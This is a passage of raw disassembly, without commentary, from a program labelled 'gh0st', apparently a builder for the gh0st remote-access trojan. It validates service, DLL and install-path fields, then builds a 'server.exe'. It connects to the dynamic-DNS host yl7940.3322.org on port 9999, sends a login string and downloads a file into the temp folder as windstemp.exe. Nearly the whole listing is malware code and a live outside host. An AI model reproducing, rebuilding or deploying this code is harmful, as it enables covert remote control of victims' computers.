00402956 . 83C4 10 add esp, 10
00402959 . 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
0040295B . 68 E8085B00 push 005B08E8 ; |提示
00402960 . FF75 EC push dword ptr [ebp-14] ; |Text
00402963 . 6A 00 push 0 ; |hOwner = NULL
00402965 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
0040296B . 83CF FF or edi, FFFFFFFF
0040296E > 834D FC FF or dword ptr [ebp-4], FFFFFFFF
00402972 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402975 . E8 F0081400 call 0054326A
0040297A . 8B4D F4 mov ecx, dword ptr [ebp-C]
0040297D . 8BC7 mov eax, edi
0040297F . 5F pop edi
00402980 . 5E pop esi
00402981 . 5B pop ebx
00402982 . 64:890D 00000>mov dword ptr fs:[0], ecx
00402989 . C9 leave
0040298A . C2 0400 retn 4
0040298D . 56 push esi
0040298E . 57 push edi
0040298F . 8BF1 mov esi, ecx
00402991 . 6A 01 push 1
00402993 . E8 CCF11300 call 00541B64
00402998 . 8DBE 40010000 lea edi, dword ptr [esi+140]
0040299E . 8BCE mov ecx, esi
004029A0 . 57 push edi
004029A1 . 68 FF030000 push 3FF
004029A6 . E8 C9FC1300 call 00542674
004029AB . 8BC8 mov ecx, eax
004029AD . E8 53D71300 call 00540105
004029B2 . 8B0F mov ecx, dword ptr [edi]
004029B4 . 33C0 xor eax, eax
004029B6 . 3941 F8 cmp dword ptr [ecx-8], eax
004029B9 . 74 35 je short 004029F0
004029BB . 8B8E 20010000 mov ecx, dword ptr [esi+120]
004029C1 . 3941 F8 cmp dword ptr [ecx-8], eax
004029C4 . 74 2A je short 004029F0
004029C6 . 3986 28010000 cmp dword ptr [esi+128], eax
004029CC . 74 09 je short 004029D7
004029CE . 8BCE mov ecx, esi
004029D0 . E8 8A0D0000 call 0040375F
004029D5 . EB 2C jmp short 00402A03
004029D7 > 50 push eax ; /pThreadId
004029D8 . 50 push eax ; |CreationFlags
004029D9 . 56 push esi ; |pThreadParm
004029DA . 68 2B284000 push 0040282B ; |ThreadFunction = gh0st.0040282B
004029DF . 50 push eax ; |StackSize
004029E0 . 50 push eax ; |pSecurity
004029E1 . FF15 98145700 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
004029E7 . 50 push eax ; /hObject
004029E8 . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004029EE . EB 13 jmp short 00402A03
004029F0 > 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
004029F2 . 68 E8085B00 push 005B08E8 ; |提示
004029F7 . 68 F0085B00 push 005B08F0 ; |请完整填服务器信息
004029FC . 50 push eax ; |hOwner
004029FD . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402A03 > 5F pop edi
00402A04 . 5E pop esi
00402A05 . C3 retn
00402A06 . B8 75E85500 mov eax, 0055E875
00402A0B . E8 685B1200 call 00528578
00402A10 . 81EC 180B0000 sub esp, 0B18
00402A16 . 53 push ebx
00402A17 . 56 push esi
00402A18 . 57 push edi
00402A19 . 8BF9 mov edi, ecx
00402A1B . 8965 F0 mov dword ptr [ebp-10], esp
00402A1E . 6A 01 push 1
00402A20 . 897D CC mov dword ptr [ebp-34], edi
00402A23 . E8 3CF11300 call 00541B64
00402A28 . 8D87 18010000 lea eax, dword ptr [edi+118]
00402A2E . 33DB xor ebx, ebx
00402A30 . 8945 B8 mov dword ptr [ebp-48], eax
00402A33 . 8B00 mov eax, dword ptr [eax]
00402A35 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A38 . 74 0B je short 00402A45
00402A3A . 8B87 14010000 mov eax, dword ptr [edi+114]
00402A40 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A43 . 75 33 jnz short 00402A78
00402A45 > 68 30040000 push 430
00402A4A . 8BCF mov ecx, edi
00402A4C . E8 23FC1300 call 00542674
00402A51 . 53 push ebx ; /lParam
00402A52 . BE F0000000 mov esi, 0F0 ; |
00402A57 . 53 push ebx ; |wParam
00402A58 . 56 push esi ; |Message => BM_GETCHECK
00402A59 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402A5C . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402A62 . 83F8 01 cmp eax, 1
00402A65 . 75 16 jnz short 00402A7D
00402A67 . 6A 40 push 40
00402A69 . 68 E8085B00 push 005B08E8 ; 提示
00402A6E . 68 100B5B00 push 005B0B10 ; 请完整填写服务的显示名称及其描述...
00402A73 . E9 88090000 jmp 00403400
00402A78 > BE F0000000 mov esi, 0F0
00402A7D > 8B87 1C010000 mov eax, dword ptr [edi+11C]
00402A83 . 3958 F8 cmp dword ptr [eax-8], ebx
00402A86 . 75 2E jnz short 00402AB6
00402A88 . 68 30040000 push 430
00402A8D . 8BCF mov ecx, edi
00402A8F . E8 E0FB1300 call 00542674
00402A94 . 53 push ebx ; /lParam
00402A95 . 53 push ebx ; |wParam
00402A96 . 56 push esi ; |Message
00402A97 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402A9A . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402AA0 . 83F8 01 cmp eax, 1
00402AA3 . 75 11 jnz short 00402AB6
00402AA5 . 6A 40 push 40
00402AA7 . 68 E8085B00 push 005B08E8 ; 提示
00402AAC . 68 F80A5B00 push 005B0AF8 ; 请完整填写服务名称...
00402AB1 . E9 4A090000 jmp 00403400
00402AB6 > 8B87 24010000 mov eax, dword ptr [edi+124]
00402ABC . 3958 F8 cmp dword ptr [eax-8], ebx
00402ABF . 75 11 jnz short 00402AD2
00402AC1 . 6A 40 push 40
00402AC3 . 68 E8085B00 push 005B08E8 ; 提示
00402AC8 . 68 E00A5B00 push 005B0AE0 ; 请完整填写dll名称...
00402ACD . E9 2E090000 jmp 00403400
00402AD2 > FFB7 20010000 push dword ptr [edi+120]
00402AD8 . FF15 A41D5900 call dword ptr [591DA4] ; gh0st.00529FFF
00402ADE . 83F8 01 cmp eax, 1
00402AE1 . 59 pop ecx
00402AE2 . 0F8E 0C090000 jle 004033F4
00402AE8 . 3D FFFF0000 cmp eax, 0FFFF
00402AED . 0F8D 01090000 jge 004033F4
00402AF3 . A1 68395B00 mov eax, dword ptr [5B3968]
00402AF8 . 8945 E8 mov dword ptr [ebp-18], eax
00402AFB . 895D FC mov dword ptr [ebp-4], ebx
00402AFE . 8945 E4 mov dword ptr [ebp-1C], eax
00402B01 . 8945 D4 mov dword ptr [ebp-2C], eax
00402B04 . 8D45 E4 lea eax, dword ptr [ebp-1C]
00402B07 . 8BCF mov ecx, edi
00402B09 . 50 push eax
00402B0A . 68 2A040000 push 42A
00402B0F . C645 FC 02 mov byte ptr [ebp-4], 2
00402B13 . E8 5CFB1300 call 00542674
00402B18 . 8BC8 mov ecx, eax
00402B1A . E8 E6D51300 call 00540105
00402B1F . 8B45 E4 mov eax, dword ptr [ebp-1C]
00402B22 . 3958 F8 cmp dword ptr [eax-8], ebx
00402B25 . 75 18 jnz short 00402B3F
00402B27 . 6A 40 push 40
00402B29 . 68 E8085B00 push 005B08E8 ; 提示
00402B2E . 68 CC0A5B00 push 005B0ACC ; 请填写安装路径...
00402B33 > 53 push ebx ; |hOwner
00402B34 . FF15 98155700 call dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA
00402B3A . E9 84080000 jmp 004033C3
00402B3F > 399F 28010000 cmp dword ptr [edi+128], ebx
00402B45 . 0F84 98000000 je 00402BE3
00402B4B . A1 68395B00 mov eax, dword ptr [5B3968]
00402B50 . 8945 EC mov dword ptr [ebp-14], eax
00402B53 . 8D45 EC lea eax, dword ptr [ebp-14]
00402B56 . 8BCF mov ecx, edi
00402B58 . 50 push eax
00402B59 . 68 FD030000 push 3FD
00402B5E . C645 FC 03 mov byte ptr [ebp-4], 3
00402B62 . E8 E6D51300 call 0054014D
00402B67 . 51 push ecx
00402B68 . 8D45 EC lea eax, dword ptr [ebp-14]
00402B6B . 8BCC mov ecx, esp
00402B6D . 8965 BC mov dword ptr [ebp-44], esp
00402B70 . 50 push eax
00402B71 . E8 69041400 call 00542FDF
00402B76 . 51 push ecx
00402B77 . C645 FC 04 mov byte ptr [ebp-4], 4
00402B7B . 8BCC mov ecx, esp
00402B7D . 8965 C4 mov dword ptr [ebp-3C], esp
00402B80 . 68 64085B00 push 005B0864 ; httpurl
00402B85 . E8 4E071400 call 005432D8
00402B8A . 51 push ecx
00402B8B . C645 FC 05 mov byte ptr [ebp-4], 5
00402B8F . 8BCC mov ecx, esp
00402B91 . 8965 E0 mov dword ptr [ebp-20], esp
00402B94 . 68 28075B00 push 005B0728 ; build
00402B99 . E8 3A071400 call 005432D8
00402B9E . C645 FC 03 mov byte ptr [ebp-4], 3
00402BA2 . E8 05100000 call 00403BAC
00402BA7 . 8BC8 mov ecx, eax
00402BA9 . 81C1 C0000000 add ecx, 0C0
00402BAF . E8 186D0000 call 004098CC
00402BB4 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BB7 . E8 F40B1400 call 005437B0
00402BBC . 53 push ebx
00402BBD . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BC0 . E8 D50A1400 call 0054369A
00402BC5 . 50 push eax
00402BC6 . E8 19F2FFFF call 00401DE4
00402BCB . 59 pop ecx
00402BCC . 50 push eax
00402BCD . 8D4D E8 lea ecx, dword ptr [ebp-18]
00402BD0 . E8 1E081400 call 005433F3
00402BD5 . 8D4D EC lea ecx, dword ptr [ebp-14]
00402BD8 . C645 FC 02 mov byte ptr [ebp-4], 2
00402BDC . E8 89061400 call 0054326A
00402BE1 . EB 45 jmp short 00402C28
00402BE3 > 8D45 E8 lea eax, dword ptr [ebp-18]
00402BE6 . 8BCF mov ecx, edi
00402BE8 . 50 push eax
00402BE9 . 68 FE030000 push 3FE
00402BEE . E8 5AD51300 call 0054014D
00402BF3 . 68 58075B00 push 005B0758 ; sgxy
00402BF8 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00402BFB . E8 99991300 call 0053C599
00402C00 . 83F8 FF cmp eax, -1
00402C03 . 75 11 jnz short 00402C16
00402C05 . 6A 40 push 40
00402C07 . 68 E8085B00 push 005B08E8 ; 提示
00402C0C . 68 A80A5B00 push 005B0AA8 ; 您填写的域名上线字串格式出错了...
00402C11 .^ E9 1DFFFFFF jmp 00402B33
00402C16 > 68 B8685C00 push 005C68B8 ; /Arg2 = 005C68B8
00402C1B . 68 58075B00 push 005B0758 ; |sgxy
00402C20 . 8D4D E8 lea ecx, dword ptr [ebp-18] ; |
00402C23 . E8 3F961300 call 0053C267 ; \gh0st.0053C267
00402C28 > A1 68395B00 mov eax, dword ptr [5B3968]
00402C2D . 8945 DC mov dword ptr [ebp-24], eax
00402C30 . 399F 2C010000 cmp dword ptr [edi+12C], ebx
00402C36 . C645 FC 07 mov byte ptr [ebp-4], 7
00402C3A . C745 E0 9C0A5>mov dword ptr [ebp-20], 005B0A9C ; deltetme
00402C41 . 75 07 jnz short 00402C4A
00402C43 . C745 E0 900A5>mov dword ptr [ebp-20], 005B0A90 ; nodelete
00402C4A > 68 31040000 push 431
00402C4F . 8BCF mov ecx, edi
00402C51 . E8 1EFA1300 call 00542674
00402C56 . 53 push ebx ; /lParam
00402C57 . 53 push ebx ; |wParam
00402C58 . 56 push esi ; |Message
00402C59 . FF70 1C push dword ptr [eax+1C] ; |hWnd
00402C5C . FF15 7C175700 call dword ptr [<&USER32.SendMessageA>; \SendMessageA
00402C62 . 83F8 01 cmp eax, 1
00402C65 . 0F84 96000000 je 00402D01
00402C6B . 53 push ebx
00402C6C . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402C6F . E8 260A1400 call 0054369A
00402C74 . 50 push eax
00402C75 . E8 6AF1FFFF call 00401DE4
00402C7A . 59 pop ecx
00402C7B . 50 push eax
00402C7C . 53 push ebx
00402C7D . 8D8F 24010000 lea ecx, dword ptr [edi+124]
00402C83 . E8 120A1400 call 0054369A
00402C88 . 50 push eax
00402C89 . E8 56F1FFFF call 00401DE4
00402C8E . 59 pop ecx
00402C8F . 50 push eax
00402C90 . 53 push ebx
00402C91 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402C94 . E8 010A1400 call 0054369A
00402C99 . 50 push eax
00402C9A . E8 45F1FFFF call 00401DE4
00402C9F . 59 pop ecx
00402CA0 . 50 push eax
00402CA1 . 53 push ebx
00402CA2 . 8D8F 1C010000 lea ecx, dword ptr [edi+11C]
00402CA8 . E8 ED091400 call 0054369A
00402CAD . 50 push eax
00402CAE . E8 31F1FFFF call 00401DE4
00402CB3 . 59 pop ecx
00402CB4 . 50 push eax
00402CB5 . 53 push ebx
00402CB6 . 8D8F 14010000 lea ecx, dword ptr [edi+114]
00402CBC . E8 D9091400 call 0054369A
00402CC1 . 50 push eax
00402CC2 . E8 1DF1FFFF call 00401DE4
00402CC7 . 59 pop ecx
00402CC8 . 8B4D B8 mov ecx, dword ptr [ebp-48]
00402CCB . 50 push eax
00402CCC . 53 push ebx
00402CCD . E8 C8091400 call 0054369A
00402CD2 . 50 push eax
00402CD3 . E8 0CF1FFFF call 00401DE4
00402CD8 . 59 pop ecx
00402CD9 . 50 push eax
00402CDA . FF75 E0 push dword ptr [ebp-20]
00402CDD . E8 02F1FFFF call 00401DE4
00402CE2 . 59 pop ecx
00402CE3 . 50 push eax
00402CE4 . 68 840A5B00 push 005B0A84 ; noactivex
00402CE9 . E8 F6F0FFFF call 00401DE4
00402CEE . 59 pop ecx
00402CEF . 50 push eax
00402CF0 . 8D45 DC lea eax, dword ptr [ebp-24]
00402CF3 . 68 6C0A5B00 push 005B0A6C ; %s!%s|%s@%s$%s^%s~%s`%s
00402CF8 . 50 push eax
00402CF9 . E8 219C1300 call 0053C91F
00402CFE . 83C4 28 add esp, 28
00402D01 > 68 F8010000 push 1F8
00402D06 . E8 7BC41300 call 0053F186
00402D0B . 59 pop ecx
00402D0C . 8945 BC mov dword ptr [ebp-44], eax
00402D0F . 3BC3 cmp eax, ebx
00402D11 . C645 FC 08 mov byte ptr [ebp-4], 8
00402D15 . 74 1C je short 00402D33
00402D17 . 53 push ebx
00402D18 . 68 580A5B00 push 005B0A58 ; 可执行文件|*.exe
00402D1D . 6A 02 push 2
00402D1F . 68 4C0A5B00 push 005B0A4C ; server.exe
00402D24 . 68 480A5B00 push 005B0A48 ; exe
00402D29 . 53 push ebx
00402D2A . 8BC8 mov ecx, eax
00402D2C . E8 0E9D1300 call 0053CA3F
00402D31 . EB 02 jmp short 00402D35
00402D33 > 33C0 xor eax, eax
00402D35 > 8B10 mov edx, dword ptr [eax]
00402D37 . 8BC8 mov ecx, eax
00402D39 . 8945 D0 mov dword ptr [ebp-30], eax
00402D3C . C645 FC 07 mov byte ptr [ebp-4], 7
00402D40 . 8945 B8 mov dword ptr [ebp-48], eax
00402D43 . FF92 B8000000 call dword ptr [edx+B8]
00402D49 . 83F8 01 cmp eax, 1
00402D4C . 0F85 65060000 jnz 004033B7
00402D52 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D58 . 50 push eax ; /Buffer
00402D59 . 68 04010000 push 104 ; |BufSize = 104 (260.)
00402D5E . FF15 6C145700 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
00402D64 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D6A . 68 380A5B00 push 005B0A38 ; /\windstemp.exe
00402D6F . 50 push eax ; |ConcatString
00402D70 . FF15 70145700 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00402D76 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402D7C . 50 push eax ; /FileName
00402D7D . FF15 74145700 call dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
00402D83 . 8D85 DCF4FFFF lea eax, dword ptr [ebp-B24]
00402D89 . 895D E0 mov dword ptr [ebp-20], ebx
00402D8C . 50 push eax ; /pWSAData
00402D8D . 68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
00402D92 . FF15 B4195700 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00402D98 . 53 push ebx ; /Protocol
00402D99 . 6A 01 push 1 ; |Type = SOCK_STREAM
00402D9B . 6A 02 push 2 ; |Family = AF_INET
00402D9D . FF15 9C195700 call dword ptr [<&WS2_32.#23>] ; \socket
00402DA3 . 83CE FF or esi, FFFFFFFF
00402DA6 . 8945 EC mov dword ptr [ebp-14], eax
00402DA9 . 3BC6 cmp eax, esi
00402DAB . 75 3D jnz short 00402DEA
00402DAD . 53 push ebx ; /Arg3
00402DAE . 53 push ebx ; |Arg2
00402DAF . 68 280A5B00 push 005B0A28 ; |socket error!\n
00402DB4 > E8 708B1400 call 0054B929 ; \gh0st.0054B929
00402DB9 . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402DBF . 8D4D DC lea ecx, dword ptr [ebp-24]
00402DC2 . C645 FC 02 mov byte ptr [ebp-4], 2
00402DC6 . E8 9F041400 call 0054326A
00402DCB . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402DCE . C645 FC 01 mov byte ptr [ebp-4], 1
00402DD2 . E8 93041400 call 0054326A
00402DD7 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402DDA . 885D FC mov byte ptr [ebp-4], bl
00402DDD . E8 88041400 call 0054326A
00402DE2 . 8975 FC mov dword ptr [ebp-4], esi
00402DE5 . E9 F4050000 jmp 004033DE
00402DEA > 6A 07 push 7
00402DEC . 33C0 xor eax, eax
00402DEE . 59 pop ecx
00402DEF . 8DBD 79FFFFFF lea edi, dword ptr [ebp-87]
00402DF5 . 889D 78FFFFFF mov byte ptr [ebp-88], bl
00402DFB . 68 180A5B00 push 005B0A18 ; /yl7940.3322.org
00402E00 . F3:AB rep stos dword ptr es:[edi] ; |
00402E02 . 66:C745 98 02>mov word ptr [ebp-68], 2 ; |
00402E08 . AA stos byte ptr es:[edi] ; |
00402E09 . FF15 BC195700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00402E0F . 3BC3 cmp eax, ebx
00402E11 . 74 2D je short 00402E40
00402E13 . 0FBF48 0A movsx ecx, word ptr [eax+A]
00402E17 . 8B40 0C mov eax, dword ptr [eax+C]
00402E1A . 51 push ecx
00402E1B . FF30 push dword ptr [eax]
00402E1D . 8D45 C4 lea eax, dword ptr [ebp-3C]
00402E20 . 50 push eax
00402E21 . E8 7A571200 call 005285A0
00402E26 . 83C4 0C add esp, 0C
00402E29 . FF75 C4 push dword ptr [ebp-3C]
00402E2C . FF15 40195700 call dword ptr [<&WS2_32.#12>] ; WS2_32.inet_ntoa
00402E32 . 50 push eax ; /String2
00402E33 . 8D85 78FFFFFF lea eax, dword ptr [ebp-88] ; |
00402E39 . 50 push eax ; |String1
00402E3A . FF15 78145700 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00402E40 > 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
00402E46 . 50 push eax ; /pAddr
00402E47 . FF15 90195700 call dword ptr [<&WS2_32.#11>] ; \inet_addr
00402E4D . 68 0F270000 push 270F ; /NetShort = 270F
00402E52 . 8945 9C mov dword ptr [ebp-64], eax ; |
00402E55 . FF15 A4195700 call dword ptr [<&WS2_32.#9>] ; \ntohs
00402E5B . 66:8945 9A mov word ptr [ebp-66], ax
00402E5F . 8D45 98 lea eax, dword ptr [ebp-68]
00402E62 . 6A 10 push 10 ; /AddrLen = 10 (16.)
00402E64 . 50 push eax ; |pSockAddr
00402E65 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402E68 . FF15 A8195700 call dword ptr [<&WS2_32.#4>] ; \connect
00402E6E . 3BC6 cmp eax, esi
00402E70 . 75 0C jnz short 00402E7E
00402E72 . 53 push ebx
00402E73 . 53 push ebx
00402E74 . 68 040A5B00 push 005B0A04 ; 连接服务器失败!\n
00402E79 .^ E9 36FFFFFF jmp 00402DB4
00402E7E > 6A 3F push 3F
00402E80 . 33C0 xor eax, eax
00402E82 . 59 pop ecx
00402E83 . 8DBD 75FBFFFF lea edi, dword ptr [ebp-48B]
00402E89 . 889D 74FBFFFF mov byte ptr [ebp-48C], bl
00402E8F . 6A 3F push 3F
00402E91 . F3:AB rep stos dword ptr es:[edi]
00402E93 . 66:AB stos word ptr es:[edi]
00402E95 . AA stos byte ptr es:[edi]
00402E96 . 59 pop ecx
00402E97 . 33C0 xor eax, eax
00402E99 . 8DBD 75FCFFFF lea edi, dword ptr [ebp-38B]
00402E9F . 889D 74FCFFFF mov byte ptr [ebp-38C], bl
00402EA5 . F3:AB rep stos dword ptr es:[edi]
00402EA7 . 66:AB stos word ptr es:[edi]
00402EA9 . AA stos byte ptr es:[edi]
00402EAA . 8B45 CC mov eax, dword ptr [ebp-34]
00402EAD . FFB0 34010000 push dword ptr [eax+134] ; /<%s>
00402EB3 . 8DB0 34010000 lea esi, dword ptr [eax+134] ; |
00402EB9 . FFB0 30010000 push dword ptr [eax+130] ; |<%s>
00402EBF . 8D85 74FBFFFF lea eax, dword ptr [ebp-48C] ; |
00402EC5 . 68 F8095B00 push 005B09F8 ; |login:%s@%s
00402ECA . 50 push eax ; |s
00402ECB . FF15 9C155700 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00402ED1 . 83C4 10 add esp, 10
00402ED4 . 8D85 74FBFFFF lea eax, dword ptr [ebp-48C]
00402EDA . 53 push ebx ; /Flags
00402EDB . 68 00010000 push 100 ; |DataSize = 100 (256.)
00402EE0 . 50 push eax ; |Data
00402EE1 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402EE4 . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00402EEA . 83F8 FF cmp eax, -1
00402EED . 53 push ebx ; /Arg3
00402EEE . 75 16 jnz short 00402F06 ; |
00402EF0 . 53 push ebx ; |Arg2
00402EF1 . 68 E8095B00 push 005B09E8 ; |发送数据失败!\n
00402EF6 > E8 2E8A1400 call 0054B929 ; \gh0st.0054B929
00402EFB > FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402F01 . E9 B1040000 jmp 004033B7
00402F06 > 8D85 74FCFFFF lea eax, dword ptr [ebp-38C] ; |
00402F0C . 68 00010000 push 100 ; |BufSize = 100 (256.)
00402F11 . 50 push eax ; |Buffer
00402F12 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402F15 . FF15 98195700 call dword ptr [<&WS2_32.#16>] ; \recv
00402F1B . 3BC3 cmp eax, ebx
00402F1D . 0F84 C5040000 je 004033E8
00402F23 . 83CF FF or edi, FFFFFFFF
00402F26 . 3BC7 cmp eax, edi
00402F28 . 0F84 BA040000 je 004033E8
00402F2E . 8D85 74FCFFFF lea eax, dword ptr [ebp-38C]
00402F34 . 68 E0095B00 push 005B09E0 ; logined
00402F39 . 50 push eax
00402F3A . FF15 981D5900 call dword ptr [591D98] ; gh0st.005307D0
00402F40 . 59 pop ecx
00402F41 . 85C0 test eax, eax
00402F43 . 59 pop ecx
00402F44 . 74 1D je short 00402F63
00402F46 . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C]
00402F4C . 50 push eax ; /FileName
00402F4D . FF15 7C145700 call dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA
00402F53 . 3BC7 cmp eax, edi
00402F55 . 53 push ebx ; /Arg3
00402F56 . 74 3C je short 00402F94 ; |
00402F58 . 53 push ebx ; |Arg2
00402F59 . 68 C0095B00 push 005B09C0 ; |file is exist and can't delete!
00402F5E . E8 C6891400 call 0054B929 ; \gh0st.0054B929
00402F63 > FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
00402F69 . 8D4D DC lea ecx, dword ptr [ebp-24]
00402F6C . C645 FC 02 mov byte ptr [ebp-4], 2
00402F70 . E8 F5021400 call 0054326A
00402F75 . 8D4D D4 lea ecx, dword ptr [ebp-2C]
00402F78 . C645 FC 01 mov byte ptr [ebp-4], 1
00402F7C . E8 E9021400 call 0054326A
00402F81 . 8D4D E4 lea ecx, dword ptr [ebp-1C]
00402F84 . 885D FC mov byte ptr [ebp-4], bl
00402F87 . E8 DE021400 call 0054326A
00402F8C . 897D FC mov dword ptr [ebp-4], edi
00402F8F . E9 4A040000 jmp 004033DE
00402F94 > 68 80000000 push 80 ; |Attributes = NORMAL
00402F99 . 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00402F9B . 53 push ebx ; |pSecurity
00402F9C . 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
00402F9E . 8D85 74FEFFFF lea eax, dword ptr [ebp-18C] ; |
00402FA4 . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00402FA9 . 50 push eax ; |FileName
00402FAA . FF15 80145700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00402FB0 . 6A 3F push 3F
00402FB2 . 8945 D8 mov dword ptr [ebp-28], eax
00402FB5 . 59 pop ecx
00402FB6 . 33C0 xor eax, eax
00402FB8 . 8DBD 75FDFFFF lea edi, dword ptr [ebp-28B]
00402FBE . F3:AB rep stos dword ptr es:[edi]
00402FC0 . 66:AB stos word ptr es:[edi]
00402FC2 . AA stos byte ptr es:[edi]
00402FC3 . 8B06 mov eax, dword ptr [esi]
00402FC5 . C685 74FDFFFF>mov byte ptr [ebp-28C], 9
00402FCC . 3958 F8 cmp dword ptr [eax-8], ebx
00402FCF . 74 16 je short 00402FE7
00402FD1 . 53 push ebx
00402FD2 . 8BCE mov ecx, esi
00402FD4 . E8 C1061400 call 0054369A
00402FD9 . 50 push eax ; /String2
00402FDA . 8D85 75FDFFFF lea eax, dword ptr [ebp-28B] ; |
00402FE0 . 50 push eax ; |String1
00402FE1 . FF15 78145700 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00402FE7 > 53 push ebx ; /Flags
00402FE8 . 8D85 74FDFFFF lea eax, dword ptr [ebp-28C] ; |
00402FEE . 68 00010000 push 100 ; |DataSize = 100 (256.)
00402FF3 . 50 push eax ; |Data
00402FF4 . FF75 EC push dword ptr [ebp-14] ; |Socket
00402FF7 . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00402FFD . 8B3D 84145700 mov edi, dword ptr [<&KERNEL32.Write>; kernel32.WriteFile
00403003 . BE B8095B00 mov esi, 005B09B8 ; 48f9648
00403008 > 68 08050000 push 508
0040300D . 8D85 6CF6FFFF lea eax, dword ptr [ebp-994]
00403013 . 53 push ebx
00403014 . 50 push eax
00403015 . E8 B6591200 call 005289D0
0040301A . 83C4 0C add esp, 0C
0040301D . 8D85 6CF6FFFF lea eax, dword ptr [ebp-994]
00403023 . 53 push ebx ; /Flags
00403024 . 68 08050000 push 508 ; |BufSize = 508 (1288.)
00403029 . 50 push eax ; |Buffer
0040302A . FF75 EC push dword ptr [ebp-14] ; |Socket
0040302D . FF15 98195700 call dword ptr [<&WS2_32.#16>] ; \recv
00403033 . 3BC3 cmp eax, ebx
00403035 . 74 68 je short 0040309F
00403037 . 83F8 FF cmp eax, -1
0040303A . 74 63 je short 0040309F
0040303C . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 11
00403043 . 74 09 je short 0040304E
00403045 . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 10
0040304C . 75 6B jnz short 004030B9
0040304E > 8D85 74FAFFFF lea eax, dword ptr [ebp-58C]
00403054 . 8D4D E8 lea ecx, dword ptr [ebp-18]
00403057 . 50 push eax
00403058 . E8 96031400 call 005433F3
0040305D . 8D45 C4 lea eax, dword ptr [ebp-3C]
00403060 . 53 push ebx
00403061 . 50 push eax
00403062 . 8D85 74F6FFFF lea eax, dword ptr [ebp-98C]
00403068 . FFB5 70F6FFFF push dword ptr [ebp-990]
0040306E . 50 push eax
0040306F . FF75 D8 push dword ptr [ebp-28]
00403072 . FFD7 call edi
00403074 . 8B85 70F6FFFF mov eax, dword ptr [ebp-990]
0040307A . 53 push ebx ; /Flags
0040307B . 0145 E0 add dword ptr [ebp-20], eax ; |
0040307E . 56 push esi ; |/String
0040307F . FF15 88145700 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00403085 . 40 inc eax ; |
00403086 . 50 push eax ; |DataSize
00403087 . 56 push esi ; |Data
00403088 . FF75 EC push dword ptr [ebp-14] ; |Socket
0040308B . FF15 94195700 call dword ptr [<&WS2_32.#19>] ; \send
00403091 . 80BD 6CF6FFFF>cmp byte ptr [ebp-994], 11
00403098 . 74 1F je short 004030B9
0040309A .^ E9 69FFFFFF jmp 00403008
0040309F > 53 push ebx ; /Arg3
004030A0 . 53 push ebx ; |Arg2
004030A1 . 68 A8095B00 push 005B09A8 ; |获取文件出错!
004030A6 . E8 7E881400 call 0054B929 ; \gh0st.0054B929
004030AB . FF75 D8 push dword ptr [ebp-28] ; /hObject
004030AE . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004030B4 .^ E9 42FEFFFF jmp 00402EFB
004030B9 > FF75 D8 push dword ptr [ebp-28] ; /hObject
004030BC . FF15 9C145700 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004030C2 . FF75 EC push dword ptr [ebp-14] ; /Socket
004030C5 . FF15 B0195700 call dword ptr [<&WS2_32.#3>] ; \closesocket
004030CB . FF15 80195700 call dword ptr [<&WS2_32.#116>] ; [WSACleanup
004030D1 . 8B4D D0 mov ecx, dword ptr [ebp-30]
004030D4 . 8D45 E0 lea eax, dword ptr [ebp-20]
004030D7 . 50 push eax
004030D8 . 895D C0 mov dword ptr [ebp-40], ebx
004030DB . 895D C4 mov dword ptr [ebp-3C], ebx
004030DE . C645 FC 09 mov byte ptr [ebp-4], 9
